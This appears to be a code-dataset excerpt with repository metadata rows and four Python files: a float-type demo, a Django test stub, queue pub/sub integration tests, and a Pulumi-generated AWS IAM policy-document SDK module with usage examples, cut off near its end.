| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8c5c1aac1b6217c39008049750fa203b809d4fbc
| 234
|
py
|
Python
|
PythonBasics/Python_DataTypes/PythonFloats.py
|
abhinavsatheesh/Python
|
9ae1a7a040522f5989c34f17d2d0764b301fa23a
|
[
"Apache-2.0"
] | null | null | null |
PythonBasics/Python_DataTypes/PythonFloats.py
|
abhinavsatheesh/Python
|
9ae1a7a040522f5989c34f17d2d0764b301fa23a
|
[
"Apache-2.0"
] | null | null | null |
PythonBasics/Python_DataTypes/PythonFloats.py
|
abhinavsatheesh/Python
|
9ae1a7a040522f5989c34f17d2d0764b301fa23a
|
[
"Apache-2.0"
] | null | null | null |
f=(0.5)
print(f"Your number {f} is of type {type(f)}")
f=(1.5)
print(f"Your number {f} is of type {type(f)}")
f=(2.5)
print(f"Your number {f} is of type {type(f)}")
f=(3.5)
print(f"Your number {f} is of type {type(f)}")
| 19.5
| 47
| 0.564103
| 52
| 234
| 2.538462
| 0.230769
| 0.181818
| 0.212121
| 0.333333
| 0.962121
| 0.962121
| 0.962121
| 0.962121
| 0.962121
| 0.962121
| 0
| 0.042553
| 0.196581
| 234
| 12
| 48
| 19.5
| 0.659574
| 0
| 0
| 0.5
| 0
| 0
| 0.642857
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
4fd76b0f2bc7303b9ccce7bea980d6cd45b8d376
| 138
|
py
|
Python
|
jumpserver-dev/apps/perms/tests.py
|
zccfzcc/docker-images
|
c211b946fdf1a6d5400d94e875a1972f4276a643
|
[
"BSD-3-Clause"
] | null | null | null |
jumpserver-dev/apps/perms/tests.py
|
zccfzcc/docker-images
|
c211b946fdf1a6d5400d94e875a1972f4276a643
|
[
"BSD-3-Clause"
] | null | null | null |
jumpserver-dev/apps/perms/tests.py
|
zccfzcc/docker-images
|
c211b946fdf1a6d5400d94e875a1972f4276a643
|
[
"BSD-3-Clause"
] | 1
|
2022-02-14T05:33:39.000Z
|
2022-02-14T05:33:39.000Z
|
from django.test import TestCase
from django.contrib.sessions.backends import file, db, cache
from django.contrib.auth.views import login
| 34.5
| 60
| 0.833333
| 21
| 138
| 5.47619
| 0.666667
| 0.26087
| 0.295652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101449
| 138
| 4
| 61
| 34.5
| 0.927419
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8b1f51caa15d831e9a916bf36486abec53d4c967
| 16,601
|
py
|
Python
|
mqclient/implementation_tests/integrate_queue.py
|
WIPACrepo/MQClient
|
5d60adbfd327826389eb3f3af4950b94cdfac620
|
[
"MIT"
] | null | null | null |
mqclient/implementation_tests/integrate_queue.py
|
WIPACrepo/MQClient
|
5d60adbfd327826389eb3f3af4950b94cdfac620
|
[
"MIT"
] | 26
|
2020-07-22T15:21:55.000Z
|
2022-03-21T23:57:17.000Z
|
mqclient/implementation_tests/integrate_queue.py
|
WIPACrepo/MQClient
|
5d60adbfd327826389eb3f3af4950b94cdfac620
|
[
"MIT"
] | null | null | null |
"""Run integration tests for given backend, on Queue class."""
# pylint:disable=invalid-name
import logging
from multiprocessing.dummy import Pool as ThreadPool
from typing import Any, List
import pytest
# local imports
from ..backend_interface import Backend
from ..queue import Queue
from .utils import (
DATA_LIST,
_log_recv,
_log_recv_multiple,
_log_send,
all_were_received,
)
class PubSubQueue:
"""Integration test suite for Queue objects."""
backend = None # type: Backend
def test_10(self, queue_name: str) -> None:
"""Test one pub, one sub."""
all_recvd: List[Any] = []
pub_sub = Queue(self.backend, name=queue_name)
pub_sub.send(DATA_LIST[0])
_log_send(DATA_LIST[0])
with pub_sub.recv_one() as d:
all_recvd.append(_log_recv(d))
assert d == DATA_LIST[0]
for d in DATA_LIST:
pub_sub.send(d)
_log_send(d)
pub_sub.timeout = 1
with pub_sub.recv() as gen:
for i, d in enumerate(gen):
print(f"{i}: `{d}`")
all_recvd.append(_log_recv(d))
# assert d == DATA_LIST[i] # we don't guarantee order
assert all_were_received(all_recvd, [DATA_LIST[0]] + DATA_LIST)
def test_11(self, queue_name: str) -> None:
"""Test an individual pub and an individual sub."""
all_recvd: List[Any] = []
pub = Queue(self.backend, name=queue_name)
pub.send(DATA_LIST[0])
_log_send(DATA_LIST[0])
sub = Queue(self.backend, name=queue_name)
with sub.recv_one() as d:
all_recvd.append(_log_recv(d))
assert d == DATA_LIST[0]
for d in DATA_LIST:
pub.send(d)
_log_send(d)
sub.timeout = 1
with sub.recv() as gen:
for i, d in enumerate(gen):
print(f"{i}: `{d}`")
all_recvd.append(_log_recv(d))
# assert d == DATA_LIST[i] # we don't guarantee order
assert all_were_received(all_recvd, [DATA_LIST[0]] + DATA_LIST)
def test_12(self, queue_name: str) -> None:
"""Failure-test one pub, two subs (one subscribed to wrong queue)."""
all_recvd: List[Any] = []
pub = Queue(self.backend, name=queue_name)
pub.send(DATA_LIST[0])
_log_send(DATA_LIST[0])
sub_fail = Queue(self.backend, name=f"{queue_name}-fail")
with pytest.raises(Exception) as excinfo:
with sub_fail.recv_one() as d:
all_recvd.append(_log_recv(d))
assert "No message available" in str(excinfo.value)
sub = Queue(self.backend, name=queue_name)
with sub.recv_one() as d:
all_recvd.append(_log_recv(d))
assert d == DATA_LIST[0]
assert all_were_received(all_recvd, [DATA_LIST[0]])
def test_20(self, queue_name: str) -> None:
"""Test one pub, multiple subs, ordered/alternatingly."""
all_recvd: List[Any] = []
pub = Queue(self.backend, name=queue_name)
# for each send, create and receive message via a new sub
for data in DATA_LIST:
pub.send(data)
_log_send(data)
sub = Queue(self.backend, name=queue_name)
with sub.recv_one() as d:
all_recvd.append(_log_recv(d))
assert d == data
# sub.close() -- no longer needed
assert all_were_received(all_recvd)
def _test_21(self, queue_name: str, num_subs: int) -> None:
"""Test one pub, multiple subs, unordered (front-loaded sending)."""
all_recvd: List[Any] = []
pub = Queue(self.backend, name=queue_name)
for data in DATA_LIST:
pub.send(data)
_log_send(data)
def recv_thread(_: int) -> List[Any]:
sub = Queue(self.backend, name=queue_name)
sub.timeout = 1
with sub.recv() as gen:
recv_data_list = list(gen)
return _log_recv_multiple(recv_data_list)
with ThreadPool(num_subs) as p:
received_data = p.map(recv_thread, range(num_subs))
all_recvd.extend(item for sublist in received_data for item in sublist)
assert all_were_received(all_recvd)
def test_21_fewer(self, queue_name: str) -> None:
"""Test one pub, multiple subs, unordered (front-loaded sending).
Fewer subs than messages.
"""
self._test_21(queue_name, len(DATA_LIST) // 2)
def test_21_same(self, queue_name: str) -> None:
"""Test one pub, multiple subs, unordered (front-loaded sending).
Same number of subs as messages.
"""
self._test_21(queue_name, len(DATA_LIST))
def test_21_more(self, queue_name: str) -> None:
"""Test one pub, multiple subs, unordered (front-loaded sending).
More subs than messages.
"""
self._test_21(queue_name, len(DATA_LIST) ** 2)
def test_22(self, queue_name: str) -> None:
"""Test one pub, multiple subs, unordered (front-loaded sending).
Use the same number of subs as number of messages.
"""
all_recvd: List[Any] = []
pub = Queue(self.backend, name=queue_name)
for data in DATA_LIST:
pub.send(data)
_log_send(data)
def recv_thread(_: int) -> Any:
sub = Queue(self.backend, name=queue_name)
with sub.recv_one() as d:
recv_data = d
# sub.close() -- no longer needed
return _log_recv(recv_data)
with ThreadPool(len(DATA_LIST)) as p:
all_recvd = p.map(recv_thread, range(len(DATA_LIST)))
assert all_were_received(all_recvd)
def test_23(self, queue_name: str) -> None:
"""Failure-test one pub, and too many subs.
More subs than messages with `recv_one()` will raise an
exception.
"""
all_recvd: List[Any] = []
pub = Queue(self.backend, name=queue_name)
for data in DATA_LIST:
pub.send(data)
_log_send(data)
def recv_thread(_: int) -> Any:
sub = Queue(self.backend, name=queue_name)
with sub.recv_one() as d:
recv_data = d
# sub.close() -- no longer needed
return _log_recv(recv_data)
with ThreadPool(len(DATA_LIST)) as p:
all_recvd = p.map(recv_thread, range(len(DATA_LIST)))
# Extra Sub
with pytest.raises(Exception) as excinfo:
recv_thread(0)
assert "No message available" in str(excinfo.value)
assert all_were_received(all_recvd)
def test_30(self, queue_name: str) -> None:
"""Test multiple pubs, one sub, ordered/alternatingly."""
all_recvd: List[Any] = []
sub = Queue(self.backend, name=queue_name)
for data in DATA_LIST:
pub = Queue(self.backend, name=queue_name)
pub.send(data)
_log_send(data)
sub.timeout = 1
sub.except_errors = False
with sub.recv() as gen:
received_data = list(gen)
all_recvd.extend(_log_recv_multiple(received_data))
assert len(received_data) == 1
assert data == received_data[0]
assert all_were_received(all_recvd)
def test_31(self, queue_name: str) -> None:
"""Test multiple pubs, one sub, unordered (front-loaded sending)."""
all_recvd: List[Any] = []
for data in DATA_LIST:
pub = Queue(self.backend, name=queue_name)
pub.send(data)
_log_send(data)
sub = Queue(self.backend, name=queue_name)
sub.timeout = 1
with sub.recv() as gen:
received_data = list(gen)
all_recvd.extend(_log_recv_multiple(received_data))
assert all_were_received(all_recvd)
def test_40(self, queue_name: str) -> None:
"""Test multiple pubs, multiple subs, ordered/alternatingly.
Use the same number of pubs as subs.
"""
all_recvd: List[Any] = []
for data in DATA_LIST:
pub = Queue(self.backend, name=queue_name)
pub.send(data)
_log_send(data)
sub = Queue(self.backend, name=queue_name)
sub.timeout = 1
with sub.recv() as gen:
received_data = list(gen)
all_recvd.extend(_log_recv_multiple(received_data))
assert len(received_data) == 1
assert data == received_data[0]
assert all_were_received(all_recvd)
def test_41(self, queue_name: str) -> None:
"""Test multiple pubs, multiple subs, unordered (front-loaded sending).
Use the same number of pubs as subs.
"""
all_recvd: List[Any] = []
for data in DATA_LIST:
pub = Queue(self.backend, name=queue_name)
pub.send(data)
_log_send(data)
for _ in range(len(DATA_LIST)):
sub = Queue(self.backend, name=queue_name)
with sub.recv_one() as d:
all_recvd.append(_log_recv(d))
# sub.close() -- no longer needed
assert all_were_received(all_recvd)
def test_42(self, queue_name: str) -> None:
"""Test multiple pubs, multiple subs, unordered (front-loaded sending).
Use the more pubs than subs.
"""
all_recvd: List[Any] = []
for data in DATA_LIST:
pub = Queue(self.backend, name=queue_name)
pub.send(data)
_log_send(data)
for i in range(len(DATA_LIST)):
if i % 2 == 0: # each sub receives 2 messages back-to-back
sub = Queue(self.backend, name=queue_name)
with sub.recv_one() as d:
all_recvd.append(_log_recv(d))
# sub.close() -- no longer needed
assert all_were_received(all_recvd)
def test_43(self, queue_name: str) -> None:
"""Test multiple pubs, multiple subs, unordered (front-loaded sending).
Use the fewer pubs than subs.
"""
all_recvd: List[Any] = []
for i, data in enumerate(DATA_LIST):
if i % 2 == 0: # each pub sends 2 messages back-to-back
pub = Queue(self.backend, name=queue_name)
pub.send(data)
_log_send(data)
for _ in range(len(DATA_LIST)):
sub = Queue(self.backend, name=queue_name)
with sub.recv_one() as d:
all_recvd.append(_log_recv(d))
# sub.close() -- no longer needed
assert all_were_received(all_recvd)
def test_50(self, queue_name: str) -> None:
"""Test_20 with variable prefetching.
One pub, multiple subs.
"""
all_recvd: List[Any] = []
pub = Queue(self.backend, name=queue_name)
for i in range(1, len(DATA_LIST) * 2):
# for each send, create and receive message via a new sub
for data in DATA_LIST:
pub.send(data)
_log_send(data)
sub = Queue(self.backend, name=queue_name, prefetch=i)
with sub.recv_one() as d:
all_recvd.append(_log_recv(d))
assert d == data
# sub.close() -- no longer needed
assert all_were_received(all_recvd, DATA_LIST * ((len(DATA_LIST) * 2) - 1))
def test_51(self, queue_name: str) -> None:
"""Test one pub, multiple subs, with prefetching.
Prefetching should have no visible affect.
"""
all_recvd: List[Any] = []
for data in DATA_LIST:
pub = Queue(self.backend, name=queue_name)
pub.send(data)
_log_send(data)
# this should not eat up the whole queue
sub = Queue(self.backend, name=queue_name, prefetch=20)
with sub.recv_one() as d:
all_recvd.append(_log_recv(d))
with sub.recv_one() as d:
all_recvd.append(_log_recv(d))
# sub.close() -- no longer needed
sub2 = Queue(self.backend, name=queue_name, prefetch=2)
sub2.timeout = 1
with sub2.recv() as gen:
for _, d in enumerate(gen):
all_recvd.append(_log_recv(d))
assert all_were_received(all_recvd)
def test_60(self, queue_name: str) -> None:
"""Test recv() fail and recovery, with multiple recv() calls.
"""
all_recvd: List[Any] = []
pub = Queue(self.backend, name=queue_name)
for d in DATA_LIST:
pub.send(d)
_log_send(d)
class TestException(Exception): # pylint: disable=C0115
pass
sub = Queue(self.backend, name=queue_name)
sub.timeout = 1
with sub.recv() as gen:
for i, d in enumerate(gen):
print(f"{i}: `{d}`")
if i == 2:
raise TestException()
all_recvd.append(_log_recv(d))
# assert d == DATA_LIST[i] # we don't guarantee order
logging.warning("Round 2!")
# continue where we left off
reused = False
sub.timeout = 1
with sub.recv() as gen:
for i, d in enumerate(gen):
print(f"{i}: `{d}`")
reused = True
all_recvd.append(_log_recv(d))
# assert d == DATA_LIST[i] # we don't guarantee order
assert reused
print(all_recvd)
assert all_were_received(all_recvd)
def test_61(self, queue_name: str) -> None:
"""Test recv() fail and recovery, with error propagation."""
all_recvd: List[Any] = []
pub = Queue(self.backend, name=queue_name)
for d in DATA_LIST:
pub.send(d)
_log_send(d)
class TestException(Exception): # pylint: disable=C0115
pass
sub = Queue(self.backend, name=queue_name)
excepted = False
try:
sub.timeout = 1
sub.except_errors = False
with sub.recv() as gen:
for i, d in enumerate(gen):
if i == 2:
raise TestException()
all_recvd.append(_log_recv(d))
# assert d == DATA_LIST[i] # we don't guarantee order
except TestException:
excepted = True
assert excepted
logging.warning("Round 2!")
# continue where we left off
reused = False
sub.timeout = 1
sub.except_errors = False
with sub.recv() as gen:
for i, d in enumerate(gen):
reused = True
all_recvd.append(_log_recv(d))
# assert d == DATA_LIST[i] # we don't guarantee order
assert reused
assert all_were_received(all_recvd)
def test_70_fail(self, queue_name: str) -> None:
"""Failure-test recv() with reusing a 'MessageGeneratorContext' instance."""
pub = Queue(self.backend, name=queue_name)
for d in DATA_LIST:
pub.send(d)
_log_send(d)
sub = Queue(self.backend, name=queue_name)
sub.timeout = 1
recv_gen = sub.recv()
with recv_gen as gen:
for i, d in enumerate(gen):
print(f"{i}: `{d}`")
# assert d == DATA_LIST[i] # we don't guarantee order
logging.warning("Round 2!")
# continue where we left off
with pytest.raises(RuntimeError):
with recv_gen as gen:
assert 0 # we should never get here
def test_80_break(self, queue_name: str) -> None:
"""Test recv() with a `break` statement."""
pub = Queue(self.backend, name=queue_name)
for d in DATA_LIST:
pub.send(d)
_log_send(d)
sub = Queue(self.backend, name=queue_name)
sub.timeout = 1
all_recvd = []
with sub.recv() as gen:
for i, d in enumerate(gen):
print(f"{i}: `{d}`")
all_recvd.append(_log_recv(d))
if i == 2:
break # NOTE: break is treated as a good exit, so the msg is acked
logging.warning("Round 2!")
# continue where we left off
with sub.recv() as gen:
for i, d in enumerate(gen):
print(f"{i}: `{d}`")
all_recvd.append(_log_recv(d))
assert all_were_received(all_recvd)
| 31.986513
| 87
| 0.560629
| 2,179
| 16,601
| 4.0771
| 0.091785
| 0.064836
| 0.070239
| 0.087798
| 0.833859
| 0.818663
| 0.797501
| 0.778928
| 0.733003
| 0.706439
| 0
| 0.010506
| 0.33492
| 16,601
| 518
| 88
| 32.048263
| 0.794131
| 0.174749
| 0
| 0.764526
| 0
| 0
| 0.011914
| 0
| 0
| 0
| 0
| 0
| 0.100917
| 1
| 0.076453
| false
| 0.006116
| 0.021407
| 0
| 0.119266
| 0.024465
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8b22c64f62377df9bfcae2e0f7e42988777bbcba
| 28,240
|
py
|
Python
|
sdk/python/pulumi_aws/iam/get_policy_document.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/iam/get_policy_document.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/iam/get_policy_document.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = [
'GetPolicyDocumentResult',
'AwaitableGetPolicyDocumentResult',
'get_policy_document',
'get_policy_document_output',
]
@pulumi.output_type
class GetPolicyDocumentResult:
"""
A collection of values returned by getPolicyDocument.
"""
def __init__(__self__, id=None, json=None, override_json=None, override_policy_documents=None, policy_id=None, source_json=None, source_policy_documents=None, statements=None, version=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if json and not isinstance(json, str):
raise TypeError("Expected argument 'json' to be a str")
pulumi.set(__self__, "json", json)
if override_json and not isinstance(override_json, str):
raise TypeError("Expected argument 'override_json' to be a str")
if override_json is not None:
warnings.warn("""Use the attribute \"override_policy_documents\" instead.""", DeprecationWarning)
pulumi.log.warn("""override_json is deprecated: Use the attribute \"override_policy_documents\" instead.""")
pulumi.set(__self__, "override_json", override_json)
if override_policy_documents and not isinstance(override_policy_documents, list):
raise TypeError("Expected argument 'override_policy_documents' to be a list")
pulumi.set(__self__, "override_policy_documents", override_policy_documents)
if policy_id and not isinstance(policy_id, str):
raise TypeError("Expected argument 'policy_id' to be a str")
pulumi.set(__self__, "policy_id", policy_id)
if source_json and not isinstance(source_json, str):
raise TypeError("Expected argument 'source_json' to be a str")
if source_json is not None:
warnings.warn("""Use the attribute \"source_policy_documents\" instead.""", DeprecationWarning)
pulumi.log.warn("""source_json is deprecated: Use the attribute \"source_policy_documents\" instead.""")
pulumi.set(__self__, "source_json", source_json)
if source_policy_documents and not isinstance(source_policy_documents, list):
raise TypeError("Expected argument 'source_policy_documents' to be a list")
pulumi.set(__self__, "source_policy_documents", source_policy_documents)
if statements and not isinstance(statements, list):
raise TypeError("Expected argument 'statements' to be a list")
pulumi.set(__self__, "statements", statements)
if version and not isinstance(version, str):
raise TypeError("Expected argument 'version' to be a str")
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def json(self) -> str:
"""
Standard JSON policy document rendered based on the arguments above.
"""
return pulumi.get(self, "json")
@property
@pulumi.getter(name="overrideJson")
def override_json(self) -> Optional[str]:
return pulumi.get(self, "override_json")
@property
@pulumi.getter(name="overridePolicyDocuments")
def override_policy_documents(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "override_policy_documents")
@property
@pulumi.getter(name="policyId")
def policy_id(self) -> Optional[str]:
return pulumi.get(self, "policy_id")
@property
@pulumi.getter(name="sourceJson")
def source_json(self) -> Optional[str]:
return pulumi.get(self, "source_json")
@property
@pulumi.getter(name="sourcePolicyDocuments")
def source_policy_documents(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "source_policy_documents")
@property
@pulumi.getter
def statements(self) -> Optional[Sequence['outputs.GetPolicyDocumentStatementResult']]:
return pulumi.get(self, "statements")
@property
@pulumi.getter
def version(self) -> Optional[str]:
return pulumi.get(self, "version")
class AwaitableGetPolicyDocumentResult(GetPolicyDocumentResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetPolicyDocumentResult(
id=self.id,
json=self.json,
override_json=self.override_json,
override_policy_documents=self.override_policy_documents,
policy_id=self.policy_id,
source_json=self.source_json,
source_policy_documents=self.source_policy_documents,
statements=self.statements,
version=self.version)
def get_policy_document(override_json: Optional[str] = None,
override_policy_documents: Optional[Sequence[str]] = None,
policy_id: Optional[str] = None,
source_json: Optional[str] = None,
source_policy_documents: Optional[Sequence[str]] = None,
statements: Optional[Sequence[pulumi.InputType['GetPolicyDocumentStatementArgs']]] = None,
version: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetPolicyDocumentResult:
"""
Generates an IAM policy document in JSON format for use with resources that expect policy documents such as `iam.Policy`.
Using this data source to generate policy documents is *optional*. It is also valid to use literal JSON strings in your configuration or to use the `file` interpolation function to read a raw JSON policy document from a file.
## Example Usage
### Basic Example
```python
import pulumi
import pulumi_aws as aws
example_policy_document = aws.iam.get_policy_document(statements=[
aws.iam.GetPolicyDocumentStatementArgs(
sid="1",
actions=[
"s3:ListAllMyBuckets",
"s3:GetBucketLocation",
],
resources=["arn:aws:s3:::*"],
),
aws.iam.GetPolicyDocumentStatementArgs(
actions=["s3:ListBucket"],
resources=[f"arn:aws:s3:::{var['s3_bucket_name']}"],
conditions=[aws.iam.GetPolicyDocumentStatementConditionArgs(
test="StringLike",
variable="s3:prefix",
values=[
"",
"home/",
"home/&{aws:username}/",
],
)],
),
aws.iam.GetPolicyDocumentStatementArgs(
actions=["s3:*"],
resources=[
f"arn:aws:s3:::{var['s3_bucket_name']}/home/&{{aws:username}}",
f"arn:aws:s3:::{var['s3_bucket_name']}/home/&{{aws:username}}/*",
],
),
])
example_policy = aws.iam.Policy("examplePolicy",
path="/",
policy=example_policy_document.json)
```
### Example Assume-Role Policy with Multiple Principals
You can specify multiple principal blocks with different types. You can also use this data source to generate an assume-role policy.
```python
import pulumi
import pulumi_aws as aws
event_stream_bucket_role_assume_role_policy = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
actions=["sts:AssumeRole"],
principals=[
aws.iam.GetPolicyDocumentStatementPrincipalArgs(
type="Service",
identifiers=["firehose.amazonaws.com"],
),
aws.iam.GetPolicyDocumentStatementPrincipalArgs(
type="AWS",
identifiers=[var["trusted_role_arn"]],
),
aws.iam.GetPolicyDocumentStatementPrincipalArgs(
type="Federated",
identifiers=[
f"arn:aws:iam::{var['account_id']}:saml-provider/{var['provider_name']}",
"cognito-identity.amazonaws.com",
],
),
],
)])
```
### Example Using A Source Document
```python
import pulumi
import pulumi_aws as aws
source = aws.iam.get_policy_document(statements=[
aws.iam.GetPolicyDocumentStatementArgs(
actions=["ec2:*"],
resources=["*"],
),
aws.iam.GetPolicyDocumentStatementArgs(
sid="SidToOverride",
actions=["s3:*"],
resources=["*"],
),
])
source_document_example = aws.iam.get_policy_document(source_policy_documents=[source.json],
statements=[aws.iam.GetPolicyDocumentStatementArgs(
sid="SidToOverride",
actions=["s3:*"],
resources=[
"arn:aws:s3:::somebucket",
"arn:aws:s3:::somebucket/*",
],
)])
```
`data.aws_iam_policy_document.source_document_example.json` will evaluate to:
```python
import pulumi
```
### Example Using An Override Document
```python
import pulumi
import pulumi_aws as aws
override = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
sid="SidToOverride",
actions=["s3:*"],
resources=["*"],
)])
override_policy_document_example = aws.iam.get_policy_document(override_policy_documents=[override.json],
statements=[
aws.iam.GetPolicyDocumentStatementArgs(
actions=["ec2:*"],
resources=["*"],
),
aws.iam.GetPolicyDocumentStatementArgs(
sid="SidToOverride",
actions=["s3:*"],
resources=[
"arn:aws:s3:::somebucket",
"arn:aws:s3:::somebucket/*",
],
),
])
```
`data.aws_iam_policy_document.override_policy_document_example.json` will evaluate to:
```python
import pulumi
```
### Example with Both Source and Override Documents
You can also combine `source_policy_documents` and `override_policy_documents` in the same document.
```python
import pulumi
import pulumi_aws as aws
source = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
sid="OverridePlaceholder",
actions=["ec2:DescribeAccountAttributes"],
resources=["*"],
)])
override = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
sid="OverridePlaceholder",
actions=["s3:GetObject"],
resources=["*"],
)])
politik = aws.iam.get_policy_document(source_policy_documents=[source.json],
override_policy_documents=[override.json])
```
`data.aws_iam_policy_document.politik.json` will evaluate to:
```python
import pulumi
```
### Example of Merging Source Documents
Multiple documents can be combined using the `source_policy_documents` or `override_policy_documents` attributes. `source_policy_documents` requires that all documents have unique Sids, while `override_policy_documents` will iteratively override matching Sids.
```python
import pulumi
import pulumi_aws as aws
source_one = aws.iam.get_policy_document(statements=[
aws.iam.GetPolicyDocumentStatementArgs(
actions=["ec2:*"],
resources=["*"],
),
aws.iam.GetPolicyDocumentStatementArgs(
sid="UniqueSidOne",
actions=["s3:*"],
resources=["*"],
),
])
source_two = aws.iam.get_policy_document(statements=[
aws.iam.GetPolicyDocumentStatementArgs(
sid="UniqueSidTwo",
actions=["iam:*"],
resources=["*"],
),
aws.iam.GetPolicyDocumentStatementArgs(
actions=["lambda:*"],
resources=["*"],
),
])
combined = aws.iam.get_policy_document(source_policy_documents=[
source_one.json,
source_two.json,
])
```
`data.aws_iam_policy_document.combined.json` will evaluate to:
```python
import pulumi
```
### Example of Merging Override Documents
```python
import pulumi
import pulumi_aws as aws
policy_one = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
sid="OverridePlaceHolderOne",
effect="Allow",
actions=["s3:*"],
resources=["*"],
)])
policy_two = aws.iam.get_policy_document(statements=[
aws.iam.GetPolicyDocumentStatementArgs(
effect="Allow",
actions=["ec2:*"],
resources=["*"],
),
aws.iam.GetPolicyDocumentStatementArgs(
sid="OverridePlaceHolderTwo",
effect="Allow",
actions=["iam:*"],
resources=["*"],
),
])
policy_three = aws.iam.get_policy_document(statements=[aws.iam.GetPolicyDocumentStatementArgs(
sid="OverridePlaceHolderOne",
effect="Deny",
actions=["logs:*"],
resources=["*"],
)])
combined = aws.iam.get_policy_document(override_policy_documents=[
policy_one.json,
policy_two.json,
policy_three.json,
],
statements=[aws.iam.GetPolicyDocumentStatementArgs(
sid="OverridePlaceHolderTwo",
effect="Deny",
actions=["*"],
resources=["*"],
)])
```
`data.aws_iam_policy_document.combined.json` will evaluate to:
```python
import pulumi
```
:param str override_json: - IAM policy document whose statements with non-blank `sid`s will override statements with the same `sid` from documents assigned to the `source_json`, `source_policy_documents`, and `override_policy_documents` arguments. Non-overriding statements will be added to the exported document.
:param Sequence[str] override_policy_documents: List of IAM policy documents that are merged together into the exported document. In merging, statements with non-blank `sid`s will override statements with the same `sid` from earlier documents in the list. Statements with non-blank `sid`s will also override statements with the same `sid` from documents provided in the `source_json` and `source_policy_documents` arguments. Non-overriding statements will be added to the exported document.
:param str policy_id: ID for the policy document.
:param str source_json: - IAM policy document used as a base for the exported policy document. Statements with the same `sid` from documents assigned to the `override_json` and `override_policy_documents` arguments will override source statements.
:param Sequence[str] source_policy_documents: List of IAM policy documents that are merged together into the exported document. Statements defined in `source_policy_documents` or `source_json` must have unique `sid`s. Statements with the same `sid` from documents assigned to the `override_json` and `override_policy_documents` arguments will override source statements.
:param Sequence[pulumi.InputType['GetPolicyDocumentStatementArgs']] statements: Configuration block for a policy statement. Detailed below.
:param str version: IAM policy document version. Valid values are `2008-10-17` and `2012-10-17`. Defaults to `2012-10-17`. For more information, see the [AWS IAM User Guide](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_version.html).
"""
__args__ = dict()
__args__['overrideJson'] = override_json
__args__['overridePolicyDocuments'] = override_policy_documents
__args__['policyId'] = policy_id
__args__['sourceJson'] = source_json
__args__['sourcePolicyDocuments'] = source_policy_documents
__args__['statements'] = statements
__args__['version'] = version
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('aws:iam/getPolicyDocument:getPolicyDocument', __args__, opts=opts, typ=GetPolicyDocumentResult).value
return AwaitableGetPolicyDocumentResult(
id=__ret__.id,
json=__ret__.json,
override_json=__ret__.override_json,
override_policy_documents=__ret__.override_policy_documents,
policy_id=__ret__.policy_id,
source_json=__ret__.source_json,
source_policy_documents=__ret__.source_policy_documents,
statements=__ret__.statements,
version=__ret__.version)
@_utilities.lift_output_func(get_policy_document)
def get_policy_document_output(override_json: Optional[pulumi.Input[Optional[str]]] = None,
override_policy_documents: Optional[pulumi.Input[Optional[Sequence[str]]]] = None,
policy_id: Optional[pulumi.Input[Optional[str]]] = None,
source_json: Optional[pulumi.Input[Optional[str]]] = None,
source_policy_documents: Optional[pulumi.Input[Optional[Sequence[str]]]] = None,
statements: Optional[pulumi.Input[Optional[Sequence[pulumi.InputType['GetPolicyDocumentStatementArgs']]]]] = None,
version: Optional[pulumi.Input[Optional[str]]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetPolicyDocumentResult]:
"""
